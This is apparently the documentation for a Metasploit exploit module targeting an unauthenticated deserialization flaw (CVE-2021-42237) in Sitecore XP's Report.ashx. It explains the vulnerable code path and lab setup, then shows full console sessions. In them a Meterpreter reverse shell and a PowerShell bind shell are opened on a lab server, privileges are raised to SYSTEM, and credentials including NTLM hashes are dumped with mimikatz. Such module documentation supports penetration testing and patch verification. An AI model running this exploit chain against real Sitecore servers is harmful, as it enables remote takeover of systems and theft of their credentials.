## Vulnerable Application
This module exploits a deserialization vulnerability in the `Report.ashx` page
of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7.
Versions 7.2.6 and earlier and 9.0 and later are not affected.

The vulnerability occurs due to `Report.ashx`'s handler, located in `Sitecore.Xdb.Client.dll`
under the `Sitecore.sitecore.shell.ClientBin.Reporting.Report` definition, having a `ProcessRequest()`
handler that calls `ProcessReport()` with the context of the attacker's request without properly
checking if the attacker is authenticated or not.

This request then causes `ReportDataSerializer.DeserializeQuery()` to be called, which will
end up calling the DeserializeParameters() function of
`Sitecore.Analytics.Reporting.ReportDataSerializer`, if a "parameters" XML tag is found in
the attacker's request.

Then for each subelement named "parameter", the code will check that it has a name and
if it does, it will call `NetDataContractSerializer().ReadObject` on it. `NetDataContractSerializer` is
vulnerable to deserialization attacks and can be trivially exploited by using the
TypeConfuseDelegate gadget chain.

By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user
that IIS is running as, aka `NT AUTHORITY\NETWORK SERVICE`. Users can then use technique 4
of the `getsystem` command to use RPCSS impersonation and get `SYSTEM` level code execution.

### Installing Sitecore 8.2 rev. 180406
1. Set up a clean Windows Server 2016 install.
1. Download SQL 2014 Express from https://www.microsoft.com/en-US/download/details.aspx?id=42299
1. Follow the defaults but when you get to the `Database Engine Configuration` section select `Mixed Mode (SQL Server authentication and Windows authentication)` and set the password for the `sa` account to a memorable password.
1. Download Sitecore from https://sitecoredev.azureedge.net/~/media/038D4E6B74DF40CC96A7B74D7609058A.ashx?date=20180425T215129 or from https://dev.sitecore.net/Downloads/Sitecore_Experience_Platform/82/Sitecore_Experience_Platform_82_Update7.aspx under the `Sitecore web application installer` link.
1. Extract the contents of the Sitecore zip file, there should be an EXE inside.
1. Go to Server Manager -> Add Roles and Features, then Role Based or Feature Based Installation.
1. Select the Web Server (IIS) role, make sure everything under Application Development is checked.
1. Check that Management Tools->IIS Management Console is checked.
1. Click next through all the prompts, accept the defaults, and restart your PC upon successful install of IIS.
1. Run the extracted Sitecore installer.
1. Provide a valid license file.
1. When providing the login details for the database, set `Login ID` to `sa` and the password to the password set earlier.
1. Continue and accept all the defaults.
1. You should now have a working install.

## Verification Steps
1. Start `msfconsole`
1. Do: `use exploit/windows/http/sitecore_xp_cve_2021_42237`
1. Set the `RHOSTS` option.
1. Set the `TARGET` option if desired.
1. Set the `VHOST` to the virtual host name of the site, which will by default be `NewInstance1`.
1. Set an appropriate payload for the `PAYLOAD` option.
1. Set any additional options as required by the previously selected payload
1. Run the exploit
1. Verify you get a shell as `NT AUTHORITY\NETWORK SERVICE`
1. Optional: Verify you can get a `SYSTEM` shell by running `getsystem -t 4`


## Options

## Scenarios

### Sitecore 8.2 rev. 180406 on Server 2016 - PowerShell Stager

```
msf payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/sitecore_xp_cve_2021_42237
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > set LHOST 172.20.223.94
LHOST => 172.20.223.94
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > set RHOSTS 172.20.211.198
RHOSTS => 172.20.211.198
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > set VHOST NewInstance1
VHOST => NewInstance1
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > show options

Module options (exploit/windows/http/sitecore_xp_cve_2021_42237):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:hos
                                         t:port][...]
   RHOSTS     172.20.211.198   yes       The target host(s), see https://github.com/rapid
                                         7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
                                         . This must be an address on the local machine o
                                         r 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is ran
                                         domly generated)
   TARGETURI  /                yes       Base path of Sitecore
   URIPATH                     no        The URI to use for this exploit (default is rand
                                         om)
   VHOST      NewInstance1     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, proces
                                        s, none)
   LHOST     172.20.223.94    yes       The listen address (an interface may be specified
                                        )
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager


msf exploit(windows/http/sitecore_xp_cve_2021_42237) > check
[*] 172.20.211.198:80 - The target appears to be vulnerable. Response.ashx is accessible and appears to be deserializing data!
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > set LPORT 8342
LPORT => 8342
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > exploit

[*] Started reverse TCP handler on 172.20.223.94:8342
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Response.ashx is accessible and appears to be deserializing data!
[*] Sending stage (200262 bytes) to 172.20.211.198
[*] Meterpreter session 1 opened (172.20.223.94:8342 -> 172.20.211.198:60958 ) at 2021-11-10 15:34:21 -0600

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem -t 4
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain           NTLM                         SHA1
--------       ------           ----                         ----
Administrator  WIN-86UKQGF31O1  a25d8e40dd22b52d59757645eae  3f2aa15db1577eb28de9adde8b02
                                5b98e                        2d4d8c042b67

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-86UKQGF31O1  (null)
WIN-86UKQGF31O1$  WORKGROUP        (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-86UKQGF31O1  (null)
MSSQL$SQLEXPRESS  NT Service       (null)
win-86ukqgf31o1$  WORKGROUP        (null)


meterpreter > sysinfo
Computer        : WIN-86UKQGF31O1
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```


### Sitecore 8.2 rev. 180406 on Server 2016 - Windows Command

```
msf payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/sitecore_xp_cve_2021_42237
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > set LHOST 172.20.223.94
LHOST => 172.20.223.94
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > set RHOSTS 172.20.211.198
RHOSTS => 172.20.211.198
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > set VHOST NewInstance1
VHOST => NewInstance1
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > show options

Module options (exploit/windows/http/sitecore_xp_cve_2021_42237):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:hos
                                         t:port][...]
   RHOSTS     172.20.211.198   yes       The target host(s), see https://github.com/rapid
                                         7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
                                         . This must be an address on the local machine o
                                         r 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is ran
                                         domly generated)
   TARGETURI  /                yes       Base path of Sitecore
   URIPATH                     no        The URI to use for this exploit (default is rand
                                         om)
   VHOST      NewInstance1     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, proces
                                        s, none)
   LHOST     172.20.223.94    yes       The listen address (an interface may be specified
                                        )
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager


msf exploit(windows/http/sitecore_xp_cve_2021_42237) > check
[*] 172.20.211.198:80 - The target appears to be vulnerable. Response.ashx is accessible and appears to be deserializing data!
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > set LPORT 8342
LPORT => 8342
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > set TARGET 0
TARGET => 0
msf exploit(windows/http/sitecore_xp_cve_2021_42237) > show options

Module options (exploit/windows/http/sitecore_xp_cve_2021_42237):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:hos
                                         t:port][...]
   RHOSTS     172.20.211.198   yes       The target host(s), see https://github.com/rapid
                                         7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
                                         . This must be an address on the local machine o
                                         r 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is ran
                                         domly generated)
   TARGETURI  /                yes       Base path of Sitecore
   URIPATH                     no        The URI to use for this exploit (default is rand
                                         om)
   VHOST      NewInstance1     no        HTTP server virtual host


Payload options (cmd/windows/powershell_bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LOAD_MODULES                   no        A list of powershell modules separated by a c
                                            omma to download over the web
   LPORT         8342             yes       The listen port
   RHOST         172.20.211.198   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows Command


msf exploit(windows/http/sitecore_xp_cve_2021_42237) > exploit

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Response.ashx is accessible and appears to be deserializing data!
[*] Executing command payload
[*] Started bind TCP handler against 172.20.211.198:8342
[*] Powershell session session 2 opened (172.20.223.94:37301 -> 172.20.211.198:8342 ) at 2021-11-10 15:37:10 -0600

Windows PowerShell running as user WIN-86UKQGF31O1$ on WIN-86UKQGF31O1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>PS C:\windows\system32\inetsrv>
PS C:\windows\system32\inetsrv> whoami
nt authority\network service
PS C:\windows\system32\inetsrv> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : mshome.net
   Link-local IPv6 Address . . . . . : fe80::8931:92f0:50c5:8fe3%4
   IPv4 Address. . . . . . . . . . . : 172.20.211.198
   Subnet Mask . . . . . . . . . . . : 255.255.240.0
   Default Gateway . . . . . . . . . : 172.20.208.1

Tunnel adapter isatap.mshome.net:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : mshome.net

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : 2001:0:34f1:8072:28f2:535:53eb:2c39
   Link-local IPv6 Address . . . . . : fe80::28f2:535:53eb:2c39%2
   Default Gateway . . . . . . . . . : ::
PS C:\windows\system32\inetsrv>
```
